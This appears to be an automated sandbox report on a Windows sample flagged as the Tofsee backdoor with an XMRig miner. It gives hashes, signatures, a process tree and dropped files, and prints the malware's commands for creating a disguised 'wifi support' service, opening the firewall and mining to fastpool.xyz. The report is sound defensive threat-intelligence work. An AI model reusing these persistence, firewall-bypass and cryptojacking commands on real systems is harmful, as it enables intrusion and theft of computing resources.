Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    27-09-2021 01:05

General

  • Target

    f8b84417b71a1e476b6195904ea2ca4007740d7de21540f25558efe5dcc1bda1.exe

  • Size

    154KB

  • MD5

    43821f948f1e4c990a805803a51050d6

  • SHA1

    8b3704dbf59cafc8ab33902b6990907c2bb9b99a

  • SHA256

    f8b84417b71a1e476b6195904ea2ca4007740d7de21540f25558efe5dcc1bda1

  • SHA512

    e31e2b2841c7f0bb749a8594b7d98f68be3e03ab2ca04ebc095fbc36b5ccfac50cbf60938aa98a18630ec5c62282052bb89564f4e2448255e88bb62eb5df19e5

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f8b84417b71a1e476b6195904ea2ca4007740d7de21540f25558efe5dcc1bda1.exe
    "C:\Users\Admin\AppData\Local\Temp\f8b84417b71a1e476b6195904ea2ca4007740d7de21540f25558efe5dcc1bda1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2072
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qzgcxqym\
      2⤵
      PID:2392
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wiuccnck.exe" C:\Windows\SysWOW64\qzgcxqym\
      2⤵
      PID:2712
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" create qzgcxqym binPath= "C:\Windows\SysWOW64\qzgcxqym\wiuccnck.exe /d\"C:\Users\Admin\AppData\Local\Temp\f8b84417b71a1e476b6195904ea2ca4007740d7de21540f25558efe5dcc1bda1.exe\"" type= own start= auto DisplayName= "wifi support"
      2⤵
      PID:3536
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" description qzgcxqym "wifi internet conection"
      2⤵
      PID:4024
    • C:\Windows\SysWOW64\sc.exe
      "C:\Windows\System32\sc.exe" start qzgcxqym
      2⤵
      PID:1428
    • C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      2⤵
      PID:1208
  • C:\Windows\SysWOW64\qzgcxqym\wiuccnck.exe
    C:\Windows\SysWOW64\qzgcxqym\wiuccnck.exe /d"C:\Users\Admin\AppData\Local\Temp\f8b84417b71a1e476b6195904ea2ca4007740d7de21540f25558efe5dcc1bda1.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1040
    • C:\Windows\SysWOW64\svchost.exe
      svchost.exe
      2⤵
      • Deletes itself
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:612
      • C:\Windows\SysWOW64\svchost.exe
        svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3880

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Temp\wiuccnck.exe

    MD5
    41f19a4848cb0082282a7155053e4880

    SHA1
    adbbf27ccf06027a68f407a08a8404a1ac5827db

    SHA256
    08164201c7f7be408b904058d416ed6923516c512de306de3a9018364d8facdc

    SHA512
    188d9dcae0c4a9336b661c91dfee9e317bc0f4bb0bb3dcdb57c40db7abff4cfc2d907d7a758005f1b060bd5420045c97bbfb2f6552844732f07e11fac51fcea7

  • C:\Windows\SysWOW64\qzgcxqym\wiuccnck.exe

    MD5
    41f19a4848cb0082282a7155053e4880

    SHA1
    adbbf27ccf06027a68f407a08a8404a1ac5827db

    SHA256
    08164201c7f7be408b904058d416ed6923516c512de306de3a9018364d8facdc

    SHA512
    188d9dcae0c4a9336b661c91dfee9e317bc0f4bb0bb3dcdb57c40db7abff4cfc2d907d7a758005f1b060bd5420045c97bbfb2f6552844732f07e11fac51fcea7

  • memory/612-125-0x0000000000530000-0x0000000000545000-memory.dmp

    Filesize
    84KB

  • memory/612-130-0x0000000000530000-0x0000000000545000-memory.dmp

    Filesize
    84KB

  • memory/612-126-0x0000000000539A6B-mapping.dmp

  • memory/1040-129-0x0000000000400000-0x00000000004AD000-memory.dmp

    Filesize
    692KB

  • memory/1208-124-0x0000000000000000-mapping.dmp

  • memory/1428-122-0x0000000000000000-mapping.dmp

  • memory/2072-117-0x0000000000400000-0x00000000004AD000-memory.dmp

    Filesize
    692KB

  • memory/2072-116-0x0000000000600000-0x0000000000613000-memory.dmp

    Filesize
    76KB

  • memory/2392-115-0x0000000000000000-mapping.dmp

  • memory/2712-118-0x0000000000000000-mapping.dmp

  • memory/3536-120-0x0000000000000000-mapping.dmp

  • memory/3880-132-0x0000000002E00000-0x0000000002EF1000-memory.dmp

    Filesize
    964KB

  • memory/3880-136-0x0000000002E9259C-mapping.dmp

  • memory/3880-137-0x0000000002E00000-0x0000000002EF1000-memory.dmp

    Filesize
    964KB

  • memory/4024-121-0x0000000000000000-mapping.dmp